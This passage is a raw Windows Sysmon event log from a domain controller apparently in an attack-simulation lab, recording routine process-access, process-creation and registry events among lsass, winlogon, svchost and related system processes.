13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.040{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.040{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-853E-5FCF-0800-000000009101}724820C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-853E-5FCF-0900-000000009101}784788C:\Windows\system32\winlogon.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.037{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bcd855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.024{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}596648C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}596648C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}596648C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0800-000000009101}724C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}596848C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0800-000000009101}724C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961028C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.946{10ACEC4A-853D-5FCF-0200-000000009101}448456C:\Windows\System32\smss.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:04.930{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:04.930{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:04.930{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.899{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.899{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.899{10ACEC4A-8540-5FCF-0C00-000000009101}596848C:\Windows\system32\svchost.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46888|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.883{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.883{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdl